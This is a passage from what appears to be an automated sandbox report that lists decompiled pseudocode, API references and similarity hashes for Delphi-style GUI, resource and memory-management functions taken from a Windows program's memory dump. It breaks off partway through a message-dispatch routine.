0x0049c141
0x0049c146
0x0049c149
0x0049c154
0x0049c165
0x0049c172
0x0049c180
0x0049c18f
0x0049c19c
0x0049c1ad
0x0049c1ba
0x0049c1cd
0x0049c1d4
0x0049c1d7
0x0049c1da
0x0049c1e7

APIs

OffsetRect.USER32 ref: 0049C154
DrawTextA.USER32(00000000,00000000,00000000,?), ref: 0049C18F
OffsetRect.USER32 ref: 0049C19C
DrawTextA.USER32(00000000,00000000,00000000,?), ref: 0049C1CD

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: DrawOffsetRectText
String ID:
API String ID: 429220523-0
Opcode ID: d904c83962f556a290ad17da23c8f211dc0ac3727e40d9062f3568b59bdbfd77
Instruction ID: ecd72a173096aa5b466fe536354e9fdd02e232758bd54e63da7738c8fbb7240f
Opcode Fuzzy Hash: d904c83962f556a290ad17da23c8f211dc0ac3727e40d9062f3568b59bdbfd77
Instruction Fuzzy Hash: 05219271614218AFCB00FF69CC81D9B73ACEF46324F45493ABD24E72D2DA79AD008628

Uniqueness

Uniqueness Score: -1.00%

Function 0045B554, Relevance: 6.1, APIs: 4, Instructions: 72
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0045B554(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) {
				intOrPtr _v8;
				void* __ecx;
				void* __edi;
				int _t27;
				void* _t40;
				int _t41;
				int _t50;

				_t50 = _t41;
				_t49 = __edx;
				_t40 = __eax;
				if(E0045AC30(__eax) == 0) {
					return GetMenuStringA(__edx, _t50, _a12, _a8, _a4);
				}
				_v8 = 0;
				if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) {
					_t27 = GetMenuItemID(_t49, _t50);
					_t51 = _t27;
					if(_t27 != 0xffffffff) {
						_v8 = E0045AAAC(_t40, 0, _t51);
					}
				} else {
					_t49 = GetSubMenu(_t49, _t50);
					_v8 = E0045AAAC(_t40, 1, _t37);
				}
				if(_v8 == 0) {
					return 0;
				} else {
					 *_a12 = 0;
					E00409530(_a12, _a8,  *((intOrPtr*)(_v8 + 0x30)));
					return E0040946C(_a12, _t49);
				}
			}

0x0045b55b
0x0045b55d
0x0045b55f
0x0045b56a
0x00000000
0x0045b5ee
0x0045b56e
0x0045b57e
0x0045b59b
0x0045b5a0
0x0045b5a5
0x0045b5b2
0x0045b5b2
0x0045b580
0x0045b587
0x0045b594
0x0045b594
0x0045b5b9
0x00000000
0x0045b5bb
0x0045b5be
0x0045b5cd
0x00000000
0x0045b5d5

APIs

GetMenuState.USER32(?,?,?), ref: 0045B577
GetSubMenu.USER32 ref: 0045B582
GetMenuItemID.USER32(?,?), ref: 0045B59B
GetMenuStringA.USER32 ref: 0045B5EE

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$ItemStateString
String ID:
API String ID: 306270399-0
Opcode ID: 842ddde7aa11a0bac271a40e0dd6c21e9fd81683f4c04f737d0438cf57d05027
Instruction ID: 8cfd9d88f676e88a541410d3cde0039cb2759316385e0967eaf71bcfe10beef0
Opcode Fuzzy Hash: 842ddde7aa11a0bac271a40e0dd6c21e9fd81683f4c04f737d0438cf57d05027
Instruction Fuzzy Hash: A0119331604108BFD704EE6E8C41AAF77E8EB49354B10446AFC09D7382E638DD05C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00466398, Relevance: 6.1, APIs: 4, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00466398(void* __eax, void* __ecx, char __edx) {
				char _v12;
				struct HWND__* _v20;
				int _t17;
				void* _t27;
				void* _t28;
				struct HWND__* _t33;
				void* _t35;
				void* _t36;
				long _t37;

				_t28 = __ecx;
				_t37 = _t36 + 0xfffffff8;
				_t27 = __eax;
				_t17 =  *0x4bcb7c; // 0x1c41284
				if( *((intOrPtr*)(_t17 + 0x30)) != 0) {
					if( *((intOrPtr*)(__eax + 0x94)) == 0) {
						 *_t37 =  *((intOrPtr*)(__eax + 0x30));
						_v12 = __edx;
						EnumWindows(E00466328, _t37);
						_t5 = _t27 + 0x90; // 0x413cd400
						_t17 =  *_t5;
						if( *((intOrPtr*)(_t17 + 8)) != 0) {
							_t33 = GetWindow(_v20, 3);
							_v20 = _t33;
							if((GetWindowLongA(_t33, 0xffffffec) & 0x00000008) != 0) {
								_v20 = 0xfffffffe;
							}
							_t10 = _t27 + 0x90; // 0x413cd400
							_t17 =  *_t10;
							_t35 =  *((intOrPtr*)(_t17 + 8)) - 1;
							if(_t35 >= 0) {
								do {
									_t13 = _t27 + 0x90; // 0x413cd400
									_t17 = SetWindowPos(E0041C834( *_t13, _t28, _t35), _v20, 0, 0, 0, 0, 0x213);
									_t35 = _t35 - 1;
								} while (_t35 != 0xffffffff);
							}
						}
					}
					 *((intOrPtr*)(_t27 + 0x94)) =  *((intOrPtr*)(_t27 + 0x94)) + 1;
				}
				return _t17;
			}

0x00466398
0x0046639a
0x0046639d
0x0046639f
0x004663a8
0x004663b5
0x004663be
0x004663c1
0x004663cd
0x004663d2
0x004663d2
0x004663dc
0x004663ea
0x004663ec
0x004663f9
0x004663fb
0x004663fb
0x00466402
0x00466402
0x0046640b
0x0046640f
0x00466411
0x00466425
0x00466431
0x00466436
0x00466437
0x00466411
0x0046640f
0x004663dc
0x0046643c
0x0046643c
0x00466446

APIs

EnumWindows.USER32(00466328), ref: 004663CD
GetWindow.USER32(00000003,00000003), ref: 004663E5
GetWindowLongA.USER32(00000000,000000EC), ref: 004663F2
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213), ref: 00466431

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$EnumLongWindows
String ID:
API String ID: 4191631535-0
Opcode ID: cb5068bd40f83499e40973b948e35be2141249864e3fa3cf0c4a1a1f36aaee56
Instruction ID: d92a3ef2a34a27394c1d90186baf91640ccf2eba55c744419332fefbc2a60add
Opcode Fuzzy Hash: cb5068bd40f83499e40973b948e35be2141249864e3fa3cf0c4a1a1f36aaee56
Instruction Fuzzy Hash: 731173306082109FD710AB2DCCC5F9677D4EB44724F15427AF998AB2D3D7789C41C76A

Uniqueness

Uniqueness Score: -1.00%

Function 0041F9CC, Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0041F9CC(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
				CHAR* _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t18;
				void* _t23;
				CHAR* _t24;
				void* _t25;
				struct HRSRC__* _t29;
				void* _t30;
				struct HINSTANCE__* _t31;
				void* _t32;

				_v8 = _t24;
				_t31 = __edx;
				_t23 = __eax;
				_t29 = FindResourceA(__edx, _v8, _a4);
				 *(_t23 + 0x10) = _t29;
				_t33 = _t29;
				if(_t29 == 0) {
					E0041F95C(_t23, _t24, _t29, _t31, _t33, _t32);
					_pop(_t24);
				}
				_t5 = _t23 + 0x10; // 0x41fa70
				_t30 = LoadResource(_t31,  *_t5);
				 *(_t23 + 0x14) = _t30;
				_t34 = _t30;
				if(_t30 == 0) {
					E0041F95C(_t23, _t24, _t30, _t31, _t34, _t32);
				}
				_t7 = _t23 + 0x10; // 0x41fa70
				_push(SizeofResource(_t31,  *_t7));
				_t8 = _t23 + 0x14; // 0x41f5f8
				_t18 = LockResource( *_t8);
				_pop(_t25);
				return E0041F5B8(_t23, _t25, _t18);
			}

0x0041f9d3
0x0041f9d6
0x0041f9d8
0x0041f9e8
0x0041f9ea
0x0041f9ed
0x0041f9ef
0x0041f9f2
0x0041f9f7
0x0041f9f7
0x0041f9f8
0x0041fa02
0x0041fa04
0x0041fa07
0x0041fa09
0x0041fa0c
0x0041fa11
0x0041fa12
0x0041fa1c
0x0041fa1d
0x0041fa21
0x0041fa2a
0x0041fa35

APIs

FindResourceA.KERNEL32 ref: 0041F9E3
LoadResource.KERNEL32(?,0041FA70,?,?,?,0041A9F4,?,00000001,00000000,?,0041F93C,?), ref: 0041F9FD
SizeofResource.KERNEL32(?,0041FA70,?,0041FA70,?,?,?,0041A9F4,?,00000001,00000000,?,0041F93C,?), ref: 0041FA17
LockResource.KERNEL32(0041F5F8,00000000,?,0041FA70,?,0041FA70,?,?,?,0041A9F4,?,00000001,00000000,?,0041F93C,?), ref: 0041FA21

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 6664574def53fa78b7d3505dc472a23c19bfb1e9475e2286f64cc82d47aac67f
Instruction ID: d73f1255ae1ca20eb74f6873295dfa6a712da68b90fc551475633a1f68062f2b
Opcode Fuzzy Hash: 6664574def53fa78b7d3505dc472a23c19bfb1e9475e2286f64cc82d47aac67f
Instruction Fuzzy Hash: D6F04BB32042047F9748EF6DA881E9B76ECDE88264321413FF908D7206DA38ED528778

Uniqueness

Uniqueness Score: -1.00%

Function 004016F8, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 45
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004016F8(void* __eax, void** __ecx, void* __edx) {
				void* _t4;
				void** _t9;
				void* _t13;
				void* _t14;
				long _t16;
				void* _t17;

				_t9 = __ecx;
				_t14 = __edx;
				_t17 = __eax;
				 *(__ecx + 4) = 0x100000;
				_t4 = VirtualAlloc(__eax, 0x100000, 0x2000, 4);
				_t13 = _t4;
				 *_t9 = _t13;
				if(_t13 == 0) {
					_t16 = _t14 + 0x0000ffff & 0xffff0000;
					_t9[1] = _t16;
					_t4 = VirtualAlloc(_t17, _t16, 0x2000, 4);
					 *_t9 = _t4;
				}
				if( *_t9 != 0) {
					_t4 = E004014B8(0x4bc5ec, _t9);
					if(_t4 == 0) {
						VirtualFree( *_t9, 0, 0x8000);
						 *_t9 = 0;
						return 0;
					}
				}
				return _t4;
			}

0x004016fc
0x004016fe
0x00401700
0x00401702
0x00401716
0x0040171b
0x0040171d
0x00401721
0x00401729
0x0040172f
0x0040173b
0x00401740
0x00401740
0x00401745
0x0040174e
0x00401755
0x00401761
0x00401768
0x00000000
0x00401768
0x00401755
0x0040176e

APIs

VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,dA&,?,?,?,00401B0A), ref: 00401716
VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,dA&,?,?,?,00401B0A), ref: 0040173B
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,dA&,?,?,?,00401B0A), ref: 00401761

Strings

dA&, xrefs: 004016FB

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$Alloc$Free
String ID: dA&
API String ID: 3668210933-2347778391
Opcode ID: 2151ac6a90c6d7a806d99010b418a9d228606707f80a4d324440e84b121e8406
Instruction ID: 4a127f85efb1f7d0171d88ebddf6a6640fcc2a9ae3ceb713bb0b10d00e7083a2
Opcode Fuzzy Hash: 2151ac6a90c6d7a806d99010b418a9d228606707f80a4d324440e84b121e8406
Instruction Fuzzy Hash: A5F0C2B16403206AEB316A2A4C85F533AD8DF45B54F14407ABA08FF3EAD6B89800876C

Uniqueness

Uniqueness Score: -1.00%

Function 00444A6C, Relevance: 6.0, APIs: 4, Instructions: 37
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00444A6C(struct HWND__* __eax, void* __ecx) {
				intOrPtr _t9;
				signed int _t16;
				struct HWND__* _t19;
				DWORD* _t20;

				_t17 = __ecx;
				_push(__ecx);
				_t19 = __eax;
				_t16 = 0;
				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t20) != 0 && GetCurrentProcessId() ==  *_t20) {
					_t9 =  *0x4bcaec; // 0x1c40dec
					if(GlobalFindAtomA(E00404898(_t9)) !=  *0x4bcae8) {
						_t16 = 0 | E00443B54(_t19, _t17) != 0x00000000;
					} else {
						_t16 = 0 | GetPropA(_t19,  *0x4bcae8 & 0x0000ffff) != 0x00000000;
					}
				}
				return _t16;
			}

0x00444a6c
0x00444a6e
0x00444a6f
0x00444a71
0x00444a75
0x00444a8c
0x00444aa3
0x00444ac3
0x00444aa5
0x00444ab5
0x00444ab5
0x00444aa3
0x00444acb

APIs

GetWindowThreadProcessId.USER32(00000000), ref: 00444A79
GetCurrentProcessId.KERNEL32(00000000,?,?,-0000000C,00000000,00444AE4,004448A6,004BCB20,00000000,00444696,?,-0000000C,?), ref: 00444A82
GlobalFindAtomA.KERNEL32(00000000), ref: 00444A97
GetPropA.USER32(00000000,00000000), ref: 00444AAE

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$AtomCurrentFindGlobalPropThreadWindow
String ID:
API String ID: 2582817389-0
Opcode ID: e45364600196cbd61008f381a9708d688f9eeab68d7a923b3bb9af3f38e04e80
Instruction ID: 08dc9cab7322de3a16a48d7fbc102f92b153888b2ab8db9babf363ac7eb56399
Opcode Fuzzy Hash: e45364600196cbd61008f381a9708d688f9eeab68d7a923b3bb9af3f38e04e80
Instruction Fuzzy Hash: 0AF0A0526465325BEB60FB6A5CC1B7F618CCE8035831C4A3BFD00E2292D62CDC4292BE

Uniqueness

Uniqueness Score: -1.00%

Function 00443B88, Relevance: 6.0, APIs: 4, Instructions: 35
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00443B88(struct HWND__* __eax, void* __ecx) {
				intOrPtr _t5;
				struct HWND__* _t12;
				void* _t15;
				DWORD* _t16;

				_t13 = __ecx;
				_push(__ecx);
				_t12 = __eax;
				_t15 = 0;
				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t16) != 0 && GetCurrentProcessId() ==  *_t16) {
					_t5 =  *0x4bcaf0; // 0x1c40e08
					if(GlobalFindAtomA(E00404898(_t5)) !=  *0x4bcaea) {
						_t15 = E00443B54(_t12, _t13);
					} else {
						_t15 = GetPropA(_t12,  *0x4bcaea & 0x0000ffff);
					}
				}
				return _t15;
			}

0x00443b88
0x00443b8a
0x00443b8b
0x00443b8d
0x00443b91
0x00443ba8
0x00443bbf
0x00443bda
0x00443bc1
0x00443bcf
0x00443bcf
0x00443bbf
0x00443be1

APIs

GetWindowThreadProcessId.USER32(00000000), ref: 00443B95
GetCurrentProcessId.KERNEL32(?,?,00000000,004670B7,?,?,0049FF87,00000001,00467223,?,?,?,0049FF87), ref: 00443B9E
GlobalFindAtomA.KERNEL32(00000000), ref: 00443BB3
GetPropA.USER32(00000000,00000000), ref: 00443BCA

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$AtomCurrentFindGlobalPropThreadWindow
String ID:
API String ID: 2582817389-0
Opcode ID: 901b1e2177071cc43cff4eaeae0c2cb6ce33568d4034be7e365e3fd0405ef91d
Instruction ID: 2d4e23a65b1b8446d2a6dc63c0f44b371400fc9c2e0e6706a207633e09f842fa
Opcode Fuzzy Hash: 901b1e2177071cc43cff4eaeae0c2cb6ce33568d4034be7e365e3fd0405ef91d
Instruction Fuzzy Hash: 41F0A7917042A59BE910BBB65CC1B27258CC904B96311097BF906E7243C53CFC0142BD

Uniqueness

Uniqueness Score: -1.00%

Function 00465C38, Relevance: 6.0, APIs: 4, Instructions: 34
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00465C38(void* __ecx) {
				void* _t2;
				DWORD* _t7;

				_t2 =  *0x4bcb7c; // 0x1c41284
				if( *((char*)(_t2 + 0xa5)) == 0) {
					if( *0x4bcb94 == 0) {
						_t2 = SetWindowsHookExA(3, E00465BF4, 0, GetCurrentThreadId());
						 *0x4bcb94 = _t2;
					}
					if( *0x4bcb90 == 0) {
						_t2 = CreateEventA(0, 0, 0, 0);
						 *0x4bcb90 = _t2;
					}
					if( *0x4bcb98 == 0) {
						_t2 = CreateThread(0, 0x3e8, E00465B98, 0, 0, _t7);
						 *0x4bcb98 = _t2;
					}
				}
				return _t2;
			}

0x00465c39
0x00465c45
0x00465c4e
0x00465c60
0x00465c65
0x00465c65
0x00465c71
0x00465c7b
0x00465c80
0x00465c80
0x00465c8c
0x00465c9f
0x00465ca4
0x00465ca4
0x00465c8c
0x00465caa

APIs

GetCurrentThreadId.KERNEL32(?,00468729,?,?,01C41284,?,?,004680AC,?), ref: 00465C50
SetWindowsHookExA.USER32(00000003,00465BF4,00000000,00000000), ref: 00465C60
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00468729,?,?,01C41284,?,?,004680AC,?), ref: 00465C7B
CreateThread.KERNEL32(00000000,000003E8,00465B98,00000000,00000000), ref: 00465C9F

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateThread$CurrentEventHookWindows
String ID:
API String ID: 1195359707-0
Opcode ID: e546f4b27cd0f08d7fb775e802dc61437fb3662252a374106bba087b3b5d797c
Instruction ID: f622b578d12f15e845de492397fbf6f90e505deaad5a87f9bd60fabc85caaef9
Opcode Fuzzy Hash: e546f4b27cd0f08d7fb775e802dc61437fb3662252a374106bba087b3b5d797c
Instruction Fuzzy Hash: A0F0D070788700AFF7106751BDC7F1A3A549725B15F10023BF109A91D2D7F93440862E

Uniqueness

Uniqueness Score: -1.00%

Function 0042F32C, Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042F32C() {
				intOrPtr _v28;
				void* _t4;
				intOrPtr _t8;
				struct HDC__* _t9;
				struct tagTEXTMETRICA* _t10;

				_t8 = 1;
				_t9 = GetDC(0);
				if(_t9 != 0) {
					_t4 =  *0x4bc8a4; // 0x18a002e
					if(SelectObject(_t9, _t4) != 0 && GetTextMetricsA(_t9, _t10) != 0) {
						_t8 = _v28;
					}
					ReleaseDC(0, _t9);
				}
				return _t8;
			}

0x0042f331
0x0042f33a
0x0042f33e
0x0042f340
0x0042f34e
0x0042f35b
0x0042f35b
0x0042f362
0x0042f362
0x0042f36e

APIs

GetDC.USER32(00000000), ref: 0042F335
SelectObject.GDI32(00000000,018A002E), ref: 0042F347
GetTextMetricsA.GDI32(00000000), ref: 0042F352
ReleaseDC.USER32(00000000,00000000), ref: 0042F362

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsObjectReleaseSelectText
String ID:
API String ID: 2013942131-0
Opcode ID: 603fc1fb78f43c0c6550fe1c1cf4e4acf723fbf7b9704dd1478d653846c72540
Instruction ID: 07b12b8ba58ce0d403a23f5ca873c759bcf371eadb98153ddbde53edc83c863a
Opcode Fuzzy Hash: 603fc1fb78f43c0c6550fe1c1cf4e4acf723fbf7b9704dd1478d653846c72540
Instruction Fuzzy Hash: E0E09A1174612126E51062666C82B9B26888F427A4F8C1136FE08AA2C2DA19DC0082FE

Uniqueness

Uniqueness Score: -1.00%

Function 00407522, Relevance: 6.0, APIs: 4, Instructions: 12
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407522(void* __eax, int __ecx, long __edx) {
				void* _t2;
				void* _t4;

				_t2 = GlobalHandle(__eax);
				GlobalUnWire(_t2);
				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
				GlobalFix(_t4);
				return _t4;
			}

0x00407527
0x0040752e
0x00407533
0x00407539
0x0040753e

APIs

GlobalHandle.KERNEL32 ref: 00407527
GlobalUnWire.KERNEL32(00000000), ref: 0040752E
GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00407533
GlobalFix.KERNEL32(00000000), ref: 00407539

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$AllocHandleWire
String ID:
API String ID: 2210401237-0
Opcode ID: e2df80ba427b572e0b55702b2a1c2d205671927aca4fd9b95937104247f87a84
Instruction ID: 8d50b03ed5e93f7ca85649f256c11cf736568be366e955f520e38ecf53e61300
Opcode Fuzzy Hash: e2df80ba427b572e0b55702b2a1c2d205671927aca4fd9b95937104247f87a84
Instruction Fuzzy Hash: 58B002C49582007DFD0833B64D0BC3B159CD9C170C382897E7682F6093D87D9C61447D

Uniqueness

Uniqueness Score: -1.00%

Function 0048EFC8, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 211
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0048EFC8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				struct HWND__* _v8;
				struct HWND__ _v12;
				char _v16;
				char _v20;
				struct HWND__* _v24;
				struct HWND__* _v28;
				struct HWND__* _v32;
				void* _t60;
				void* _t66;
				void* _t77;
				intOrPtr _t83;
				void* _t91;
				intOrPtr _t94;

				_t89 = __edi;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t77 = __edx;
				_t91 = __eax;
				_push(_t94);
				_push(0x48f2bf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t94;
				E0044C44C(__eax, 0, __edx, __eflags);
				if( *((char*)(_t91 + 0x296)) == 0) {
					L34:
					_pop(_t83);
					 *[fs:eax] = _t83;
					_push(0x48f2c6);
					E004043FC( &_v32, 2);
					return E004043FC( &_v16, 2);
				} else {
					if( *((intOrPtr*)(_t91 + 0x2c4)) != 0) {
						_t66 =  *(_t77 + 4) + 0xd0 - 0xa;
						if(_t66 < 0 || _t66 + 0xf9 - 0x1a < 0) {
							if((E0045E5B0() & 0x00000004) == 0) {
								_t89 = E004995CC(E0048CF44( *((intOrPtr*)( *((intOrPtr*)(_t91 + 0x2c4)) + 0x2b0))), _t77,  *(_t77 + 4), _t89, _t91);
								if(_t89 != 0) {
									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t89 + 0x40)))) + 0xe0))();
								}
							}
						}
					}
					_t60 = ( *(_t77 + 4) & 0x0000ffff) + 0xfffffff3;
					if(_t60 > 0x21) {
						goto L34;
					}
					switch( *((intOrPtr*)( *(_t60 + 0x48f069) * 4 +  &M0048F08B))) {
						case 0:
							goto L34;
						case 1:
							E0048EC48(_t91, 0, _t89, _t91, _t102);
							goto L34;
						case 2:
							__eax = __esi;
							__eax = E0048EC48(__esi, __edx, __edi, __esi, __eflags);
							goto L34;
						case 3:
							__eax = __esi;
							__edx =  *(E004997D4(__esi) + 0x40);
							__eax = __esi;
							__eax = E0048ED68(__edx);
							goto L34;
						case 4:
							__eax = __esi;
							__edx =  *(E00499794(__esi) + 0x40);
							__eax = __esi;
							__eax = E0048ED68(__edx);
							goto L34;
						case 5:
							__eax = __esi;
							__eax = E0048E460(__esi);
							__eflags = __eax;
							if(__eax != 0) {
								__eax = __esi;
								__eax = E0048E460(__esi);
								__edx = __eax->i;
								__eax =  *((intOrPtr*)(__edx + 0xe0))();
							}
							goto L34;
						case 6:
							__eax = __esi;
							__edx = __esi->i;
							__eax =  *((intOrPtr*)(__edx + 0x104))();
							__eflags = __al;
							if(__al == 0) {
								L18:
								__eax =  *0x4bb1d8; // 0x4bcadc
								__eax = E00451F00(__eax);
								__eflags = __al;
								if(__al == 0) {
									__eax = __esi;
									__edx = __esi->i;
									__eax =  *((intOrPtr*)(__edx + 0x17c))();
								} else {
									__eax = E0044557C();
								}
								goto L34;
							}
							__eflags =  *(__esi + 0x290);
							if( *(__esi + 0x290) == 0) {
								goto L18;
							}
							__eax = 0;
							__eax = E004452A4(0);
							goto L34;
						case 7:
							__eax = __esi;
							__edx = __esi->i;
							__eax =  *((intOrPtr*)(__edx + 0x104))();
							__eflags = __al;
							if(__al == 0) {
								goto L34;
							}
							__eax = __esi;
							__eax = E0048E460(__esi);
							__eflags = __eax;
							if(__eax == 0) {
								goto L34;
							}
							__eax = __esi;
							__edi = E0048E460(__esi);
							__eflags =  *(__edi + 0x31) & 0x00000004;
							if(( *(__edi + 0x31) & 0x00000004) == 0) {
								__edx =  &_v12;
								__eax =  *0x4bad5c; // 0x426674
								__eax = E0040656C(__eax, __ecx, __edx);
								__ecx = _v12;
								__eax =  *0x407b7c; // 0x407bc8
								__eax = E0040CAC4(_v12, __edx);
								E00403DEC();
							}
							__edi = E00496418(__edi);
							__eflags = __al;
							if(__al == 0) {
								L27:
								__eax = __edi;
								_v8 = E0041D258(__edi);
								__eax = __esi;
								__edx = __esi->i;
								__eax =  *((intOrPtr*)(__esi->i + 0x114))();
								__eax = __esi - 1;
